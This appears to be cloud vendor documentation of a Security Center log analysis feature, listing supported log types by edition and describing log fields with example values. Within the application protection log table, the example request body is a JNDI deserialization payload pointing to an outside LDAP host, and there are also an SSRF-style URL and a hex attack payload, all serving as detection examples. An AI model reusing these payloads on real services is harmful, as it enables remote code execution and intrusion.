The log analysis feature of Security Center provides centralized storage, query, and analysis of host activities and security events to facilitate security audits, event tracing, and threat discovery. This topic describes the log types that Security Center supports, the differences between editions, the log fields, and provides query examples.
Version support
Subscription
Host logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Logon logs | |||||
Network connection logs | |||||
Process startup logs | |||||
Brute-force attack logs | |||||
DNS query logs | |||||
Client event logs | |||||
Account snapshot logs | |||||
Network snapshot logs | |||||
Process snapshot logs |
Security logs
Log categorization | Basic | Anti-virus | Advanced | Enterprise | Ultimate |
Security alert logs | Note Only alerts supported by the Basic edition are recorded. | ||||
Vulnerability logs | Note Only vulnerabilities supported by the Basic edition are recorded. | ||||
Network defense logs | |||||
Core file monitoring event logs | |||||
CSPM - Baseline checks |
Value-added service logs
If you enable the following value-added services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM(Baseline Check logs and CSPM logs)
Pay-as-you-go service
If you purchase the Host and Container Security pay-as-you-go service, the supported log types vary depending on the protection level that is bound to the server.
Host logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Logon logs | ||||
Network connection logs | ||||
Process startup logs | ||||
Brute-force attack logs | ||||
DNS query logs | ||||
Client event logs | ||||
Account snapshot logs | ||||
Network snapshot logs | ||||
Process snapshot logs |
Security logs
Log categorization | Unprotected | Antivirus | Host Protection | Hosts and Container Protection |
Security alert logs | Note Only alerts supported for the Unprotected level are recorded. | |||
Vulnerability logs | Note Only vulnerabilities that are not covered by a protection level are recorded. | |||
Network defense logs | ||||
Core file monitoring event logs |
Pay-as-you-go Service Logs
If you enable the following pay-as-you-go services, Security Center can analyze the logs that they generate.
Malicious File Detection
Agentless Detection
Application Protection
CSPM(Baseline Check logs and CSPM logs)
Log type descriptions
The following log samples and field descriptions are for reference only. The specific fields are subject to change with product updates. For the most accurate information, refer to the data collected in Simple Log Service.
Host logs
__topic__:
aegis-log-loginLog content: Records user logon events on servers, including the source IP address, username, and logon result.
Description: Helps you monitor user activities and promptly identify and respond to abnormal behavior.
ImportantSecurity Center does not support collecting logon logs for the Windows Server 2008 operating system.
Collection period: Real-time.
__topic__:
aegis-log-networkLog content: Records network connection activities on the server in real time, including information such as the connection 5-tuple and associated processes.
Description: Helps you discover abnormal connection behavior, identify potential network attacks, and optimize network performance.
ImportantThe server collects only some connection statuses from establishment to termination.
Inbound traffic is not recorded.
Collection period: Real-time.
__topic__:
aegis-log-processLog content: Records startup events for all new processes on the server, including information such as the process name, command-line parameters, and the parent process.
Description: Helps you understand the startup status and configuration of processes in the system and detect issues such as abnormal process activities, malware intrusions, and security threats.
Collection period: Real-time. Logs are reported immediately after a process starts.
__topic__:
aegis-log-crackLog content: Records brute-force attack behavior, including attempts to log on to and crack systems, applications, or accounts.
Description: Helps you identify brute-force attacks, detect abnormal logons, weak passwords, and credential leaks. These logs also support event response and forensic analysis.
Collection period: Real-time.
__topic__:
aegis-snapshot-hostLog content: Records detailed information about user accounts in a system or application, including basic account properties such as the username, password policy, and logon history.
Description: By comparing snapshots from different points in time, you can monitor account changes and promptly detect security issues such as unauthorized access and abnormal account statuses.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__:
aegis-snapshot-portLog content: Records network connection information, including the connection 5-tuple, connection status, and associated processes.
Description: Helps you understand the active network connections in your system, discover abnormal connection behavior, and identify potential network attacks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__:
aegis-snapshot-processLog content: Records process activities in the system, including the process ID, name, and startup time.
Description: Use these logs to understand process activities and resource usage, and detect issues such as abnormal processes, high CPU usage, and memory leaks.
Collection period: Data is collected automatically at the interval that is set in Asset Fingerprints. If no interval is set, data is collected once a day. You can also manually collect data.
__topic__:
aegis-log-dns-queryLog content: Records DNS query requests that are initiated by the server, including information such as the queried domain name, query type, and source.
ImportantLog collection is not supported for Linux servers with a kernel version earlier than 4.X.X.
Description: Use these logs to analyze DNS activities and detect issues such as abnormal queries, domain hijacking, and DNS pollution.
Collection period: Real-time.
__topic__:
aegis-log-clientLog content: Records the online and offline events of the Security Center agent.
Description: Helps you monitor the running status of the Security Center agent.
Collection period: Real-time.
Security logs
All security logs are collected in real time.
__topic__:
sas-vul-logLog content: Records information about vulnerabilities found in your systems or applications, including the vulnerability name, status, and handling action.
Description: Helps you understand the vulnerabilities, security risks, and attack trends in your system so that you can take timely remediation measures.
__topic__:
sas-hc-logLog content: Records the results of baseline risk checks, including information such as the baseline level, category, and risk level.
ImportantOnly data for check items that fail for the first time is recorded. Data for check items that previously passed but now fail a new check is also recorded.
Description: Helps you understand the baseline security status and potential risks of your system.
__topic__:
sas-security-logLog content: Records security events and alerts that occur in your system or application, including the alert data source, details, and alert level.
Description: Helps you understand the security events and threats in your system so that you can take appropriate response measures.
CSPM - Cloud platform configuration check logs
__topic__:
sas-cspm-logLog content: Records information such as cloud platform configuration check results and whitelisting operations.
Description: Helps you understand configuration issues and potential security risks in your cloud platform.
__topic__:
sas-net-blockLog content: Records network attack events, including key information such as the attack type and source/destination IP addresses.
Description: Helps you understand security events on your network so that you can take response and defense measures to improve network security.
__topic__:
sas-rasp-logLog content: Records attack alert information from Runtime Application Self-Protection (RASP), including the attack type, behavioral data, and attacker IP address.
Description: Helps you understand security events in your application so that you can take response and defense measures to improve application security.
Topic:
sas-filedetect-logLog content: Records detection results from the malware detection software development kit (SDK), including file information, detection scenario, and results.
Description: Helps you identify and promptly handle malicious programs in offline files or cloud storage.
Core file monitoring event logs
Topic:
aegis-file-protect-logLog content: Records alert events detected by the core file monitoring feature, including the file path, operation type, and alert level.
Description: Helps you monitor whether core files are stolen or tampered with.
__topic__:
sas-agentless-logLog content: Records security risks detected in cloud servers, disk snapshots, and images. These risks include vulnerabilities, baselines, malicious samples, and sensitive files.
Description: Helps you view the security risk status of your assets over different time periods to identify and respond to potential threats.
Host log fields
Logon logs
Field name | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
src_ip | IP address of the server to log on to. | 221.11.XX.XX |
dst_port | The logon port of the server. | 22 |
login_type | The logon type. Valid values include but are not limited to:
| SSH |
username | The logon username. | admin |
login_count | The number of logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network connection logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
net_connect_dir | The direction of the network connection. Valid values:
| in |
dst_ip | The IP address of the network connection receiver.
| 192.168.XX.XX |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_name | The filename of the parent process. | /usr/bin/bash |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The process name. | nginx |
proc_path | The process path. | /usr/local/nginx/sbin/nginx |
proc_start_time | The startup time of the process. | N/A |
connection_type | The protocol. Valid values:
| tcp |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the grandparent process. | containerd-shim |
status | The network connection status. Valid values:
| 5 |
type | The type of real-time network connection. Valid values:
| listen |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Process startup logs
Field Name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. Use the index to look up the process chain. | B184 |
cmd_index | The index of each parameter in the command line. Each pair of indexes indicates the start and end of a parameter. | 0,3,5,8 |
cmdline | The full command line for starting the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name associated with the process. | N/A |
container_hostname | The server name in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The process ID in the container. | 0 |
cwd | The directory where the process is running. | N/A |
proc_name | The process filename. | ipset |
proc_path | The full path of the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The user group. | group1 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
parent_proc_name | The parent process filename. | kube-proxy |
parent_proc_path | The full path of the parent process file. | /usr/local/bin/kube-proxy |
pid | The process ID. | 14275 |
ppid | The parent process ID. | 14268 |
proc_start_time | The process startup time. | 2024-08-01 16:45:40 |
parent_proc_start_time | The startup time of the parent process. | 2024-07-12 19:45:19 |
sas_group_name | The asset group of the server in Security Center. | default |
srv_cmd | The command line of the grandparent process. | /usr/bin/containerd |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
uid | The user ID. | 123 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Brute-force attack logs
Field name | Description | Example |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that is subject to brute-force attacks. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
uuid | The UUID of the server that is subject to brute-force attacks. | 5d83b26b-b7ca-4a0a-9267-12***** |
login_count | The number of failed logons. Repeated logons within one minute are merged into a single log entry. For example, if the value of | 3 |
src_ip | The source IP address for the logon. | 47.92.XX.XX |
dst_port | The logon port. | 22 |
login_type | The logon type. Valid values:
| SSH |
username | The logon username. | user |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Account snapshot logs
Field Name | Description | Example |
account_expire | The expiration time of the account. never indicates that the account never expires. | never |
domain | The domain or directory service to which the account belongs. N/A indicates that the account does not belong to any domain. | N/A |
groups | The group to which the account belongs. N/A indicates that the account does not belong to any group. | ["nscd"] |
home_dir | The home directory. This is the default location for storing and managing files in the system. | /Users/abc |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon to the account. N/A indicates that the account has never been logged on to. | 2023-08-18 09:21:21 |
login_ip | The remote IP address of the last logon to the account. N/A indicates that the account has never been logged on to. | 192.168.XX.XX |
passwd_expire | The expiration date of the password. never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values:
| 0 |
sas_group_name | The asset group of the server in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the user account. Valid values:
| 0 |
tty | The logon terminal. N/A indicates that the account has never logged on to a terminal. | N/A |
username | The username. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date for the password expiration reminder. never indicates that a reminder is never sent. | 2024-08-20 |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network snapshot logs
Field name | Description | Example |
net_connect_dir | The direction of the network connection. Valid values: in — inbound. | in |
dst_ip | The IP address of the peer, which is generally empty. | |
dst_port | The port of the network connection receiver. | 443 |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
pid | The process ID. | 682 |
proc_name | The process name. | sshd |
connection_type | The protocol. Valid values:
| tcp4 |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The local IP address. | 100.127.XX.XX |
src_port | The listening port. | 41897 |
status | The value 2 indicates that the port is listening (listen), and the associated src_ip/src_port represents the listening address. | 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Process snapshot logs
Field Name | Description | Example |
cmdline | The full command line for starting the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash of the binary file. Note The MD5 hash is not calculated for process files larger than 1 MB. | 1086e731640751c9802c19a7f53a64f5 |
proc_name | The process filename. | assist_daemon |
proc_path | The full path of the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The process ID. | 1692 |
pname | The parent process filename. | systemd |
sas_group_name | The asset group of the server in Security Center. | default |
proc_start_time | The process startup time. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the process user. | 101 |
username | The username of the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
DNS query logs
Field Name | Description | Example |
domain | The domain name corresponding to the DNS query. | example.aliyundoc.com |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
host_ip | The IP address of the server that initiated the DNS query. | 192.168.XX.XX |
pid | The process ID that initiated the DNS query. | 3544 |
ppid | The parent process ID that initiated the DNS query. | 3408 |
cmd_chain | The process chain that initiated the DNS query. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
cmdline | The command line that initiated the DNS query. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path of the process that initiated the DNS query. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group of the server in Security Center. | default |
time | The time when the DNS query event was captured. This time is generally the same as the time when the DNS query occurred. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiated the DNS query. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Client event logs
Field Name | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
host_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | Client version | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The operating system type. Valid values:
| linux |
region_id | The region ID where the server resides. | cn-beijing |
status | The agent status. Valid values:
| online |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Security log fields
Vulnerability logs
Field Name | Description | Example |
vul_alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
risk_level | The risk level. Valid values:
| later |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
instance_name | The hostname. | hhht-linux-*** |
vul_name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
operation | The action performed on the vulnerability. Valid values:
| new |
status | The status. Valid values:
| 1 |
tag | The tag of the vulnerability. Valid values:
| oval |
type | The vulnerability type. Valid values:
| sys |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
CSPM - Baseline check logs
Field name | Description | Example |
check_item_name | The name of the check item. | Set minimum interval for password changes |
check_item_level | The check level of the baseline. Valid values:
| medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
risk_level | The risk level of the risk item. Valid values:
| medium |
operation | The operation. Valid values:
| new |
risk_name | The name of the risk item. | Password policy compliance check |
sas_group_name | The asset group of the server on which the risk item is detected in Security Center. | default |
status | The status. Valid values:
| 1 |
sub_type_alias_name | The alias of the subtype. | International security best practices - Ubuntu 16/18/20/22 security baseline check |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias_name | The alias of the type. | International security best practices |
type_name | The baseline type. For valid values of the baseline type, see List of baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Security alert logs
Field name | Description | Example |
data_source | The data source. Valid values:
| aegis_login_log |
detail | A JSON object that provides detailed context for the alert. The fields in this object vary based on the alert type. The following describes common fields of the
| {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Unusual Account Logon to ECS","status":0} |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
level | The risk level of the alert event. Valid values:
| suspicious |
name | The alert name. | Anomalous Logon - Unusual Account Logon to ECS |
operation | The operation. Valid values:
| new |
status | The status of the alert. Valid values:
| 1 |
unique_info | The unique identifier of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server that generated the alert. | ad66133a-dc82-4e5e-9659-a49e3**** |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
suspicious_event_id | The alert event ID. | 650226318 |
handle_time | The time corresponding to the operation. | 1765272845 |
alert_first_time | The time when the alert first occurred. | 1764226915 |
alert_last_time | The time when the alert last occurred. | 1765273425 |
strict_mode | Indicates whether the alert is a strict mode alert. Valid values: true, false. | true |
user_id | The account ID. | 1358******3357 |
CSPM - Cloud platform configuration check logs
Field name | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to obtain the ID. | 11 |
check_item_name | The name of the check item. | Origin fetch configuration |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
instance_name | The instance name. | lsm |
instance_result | The impact of the risk. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values:
| INSTANCE |
instance_type | The instance type. Valid values:
| ECS |
region_id | The region ID where the instance resides. | cn-hangzhou |
requirement_id | The requirement ID. You can call the ListCheckStandard operation to obtain the ID. | 5 |
risk_level | The risk level. Valid values:
| MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to obtain the ID. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to obtain the ID. | 1 |
status | The status of the check item. Valid values:
| PASS |
vendor | The cloud service provider. The value is fixed to ALIYUN. | ALIYUN |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Network defense logs
Field Name | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The payload converted from HEX format to characters. | POST /Services/FileService/UserFiles/ |
dst_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dst_port | The port of the attacked asset. | 80 |
func | The type of the intercepted event. Valid values:
| payload |
rule_type | The specific rule type of the intercepted event. Valid values:
| alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
final_action | Defense action pattern. Value: block (intercepted). | block |
payload | The payload in HEX format. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The system type of the attacked asset. Valid values:
| linux |
proc_path | The path of the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group of the server in Security Center. | default |
src_ip | The source IP address of the attack. | 106.11.XX.XX |
src_port | The source port that initiated the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
start_time | The start timestamp, in seconds. This also indicates when the event occurred. | 1719472214 |
Application protection logs
Field Name | Description | Example |
app_dir | The directory where the application resides. | /usr/local/aegis/rasp/apps/1111 |
app_id | The application ID. | 6492a391fc9b4e2aad94**** |
app_name | The name of the application. | test |
confidence_level | The confidence level of the detection algorithm. Valid values:
| low |
request_body | The request body. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | The length of the request body. | 112 |
data | The hook point parameters. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | The request header. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | The name of the host or network device. | testhostname |
host_ip | The private IP address of the host. | 172.16.XX.XX |
is_cliped | Indicates whether the log was truncated because it was too long. Valid values:
| false |
jdk_version | The JDK version. | 1.8.0_292 |
message | The alert description. | Unsafe class serial. |
request_method | The request method. | Post |
platform | The operating system type. | Linux |
arch | The operating system architecture. | amd64 |
kernel_version | The operating system kernel version. | 3.10.0-1160.59.1.el7.x86_64 |
param | The request parameters. Common formats include the following:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | An effective attack payload. | bash -c kill -0 -- -'31098' |
payload_length | The length of the attack payload. | 27 |
rasp_id | The unique ID of the application protection probe. | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | The version of the application protection probe. | 0.8.5 |
src_ip | The IP address of the requester. | 172.0.XX.XX |
final_action | The result of how the alert is handled. Valid values:
| block |
rule_action | The alert handling method specified by the rule. Valid values:
| block |
risk_level | The risk level. Valid values:
| high |
stacktrace | The stack information. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | The time when the alert was triggered. | 2023-10-09 15:19:15 |
timestamp | The timestamp when the alert was triggered, in milliseconds. | 1696835955070 |
type | The attack type. Valid values:
| rce |
url | The request URL. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | The UUID of the attack event. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | The host UUID. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | The public IP address of the host. | 1.2.XX.XX |
intranet_ip | The private IP address of the host. | 172.16.XX.XX |
sas_group_name | The name of the server group in Security Center. | Group 1 |
instance_id | The host instance ID. | i-wz995eivg28f1m** |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
Malware detection logs
Field Name | Description | Example |
bucket_name | The bucket name. | ***-test |
event_id | The alert ID. | 802210 |
event_name | The alert name. | Mining program |
md5 | The MD5 hash of the file. | 6bc2bc******53d409b1 |
sha256 | The SHA256 hash of the file. | f038f9525******7772981e87f85 |
result | The detection result. Valid values:
| 0 |
file_path | The file path. | test.zip/bin_test |
etag | The OSS file identifier. | 6BC2B******853D409B1 |
risk_level | The risk level. Valid values:
| remind |
source | The detection scenario. Valid values:
| OSS |
parent_md5 | The MD5 hash of the parent class file or compressed package. | 3d0f8045bb9****** |
parent_sha256 | The SHA256 hash of the parent file or compressed package. | 69b643d6******a3fb859fa |
parent_file_path | The name of the parent file or compressed package. | test.zip |
start_time | The start timestamp, in seconds. This also indicates the time when the event occurred. | 1719472214 |
compress_file_number | Compressed package file ordinal number, in the format | 1/10: The archive contains 10 files. This is file 1. |
Core file monitoring event logs
Field Name | Description | Example |
start_time | The most recent time the event occurred. Unit: seconds. | 1718678414 |
uuid | The UUID of the agent. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | The file path. | /etc/passwd |
proc_path | The process path. | /usr/bin/bash |
rule_id | The ID of the rule that was hit. | 123 |
rule_name | The rule name. | file_test_rule |
cmdline | The command line. | bash /opt/a |
operation | The operation on the file. | READ |
risk_level | The alert level. | 2 |
pid | The process ID. | 45324 |
proc_permission | The process permissions. | rwxrwxrwx |
instance_id | The instance ID. | i-wz995eivg2**** |
internet_ip | The public IP address. | 192.0.2.1 |
intranet_ip | The private IP address. | 172.16.0.1 |
instance_name | The instance name. | aegis-test |
platform | The operating system type. | Linux |
Agentless detection logs
Common fields for vulnerabilities, baselines, and malicious samples
Field name | Description | Example |
uuid | The server UUID. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | The instance ID. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the asset. | 192.168.XX.XX |
sas_group_name | The asset group of the server in Security Center. | default |
start_time | The start timestamp in seconds. This also indicates the time when the event occurred. | 1719472214 |
Vulnerability risk fields
Field Name | Description | Example |
vul_name | The name of the vulnerability. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | The alias of the vulnerability. | gson code issue vulnerability (CVE-2022-25647) |
vul_primary_id | The primary key ID of the vulnerability. | 990174361 |
type | The vulnerability type. Valid values:
| sca |
alert_level | The risk level of the vulnerability. Valid values:
| asap |
instance_name | The hostname. | hhht-linux-*** |
operation | The action performed on the vulnerability. Valid values:
| new |
status | The status information of the vulnerability. Valid values:
| 1 |
tag | The tag of the vulnerability. Valid values:
Note The tags for other vulnerability types are random strings. | oval |
Baselinecheck fields
Field name | Description | Example |
check_item_name | The name of the check item. | Set password expiration time |
check_item_level | The risk level of the check item. Valid values:
| high |
check_type | The type of the check item. | Identity authentication |
risk_level | The risk level of the risk item. Valid values:
| low |
operation | The operation. Valid values:
| new |
risk_name | The name of the risky check item. | Password policy compliance check |
status | The status of the check item. Valid values:
| 1 |
sub_type_alias_name | The alias of the subtype. | Alibaba Cloud standard - CentOS Linux 7/8 security baseline |
sub_type_name | The name of the baseline subtype. For more information about the valid values of the baseline subtype, see List of baseline types and subtypes. | hc_centos7 |
type_name | The type name. | hc_best_secruity |
type_alias_name | The alias of the type. | Best practices |
container_id | The container ID. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | The container name. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Malicious sample fields
Field name | Description | Example |
alert_level | The risk level of the alert event. Valid values:
| suspicious |
alert_name | The name of the malicious sample alert. | Suspicious Process - SSH-based |
operation | The operation. Valid values:
| new |
status | The risk status of the malicious sample. Valid values:
| 0 |
suspicious_event_id | The alert event ID. | 909361 |
Sensitive file fields
Field name | Description | Example |
alert_level | The risk level. Valid values:
| high |
rule_name | The file type name. | Ionic token |
file_path | The path of the sensitive file. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | The check result. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Appendix
List of baseline types and subtypes
Type name | Subtype name | Description |
hc_exploit | hc_exploit_redis | Important threat exploit: Unauthorized access to Redis |
hc_exploit_activemq | Important threat exploit: Unauthorized access to ActiveMQ | |
hc_exploit_couchdb | Important threat exploit: Unauthorized access to CouchDB | |
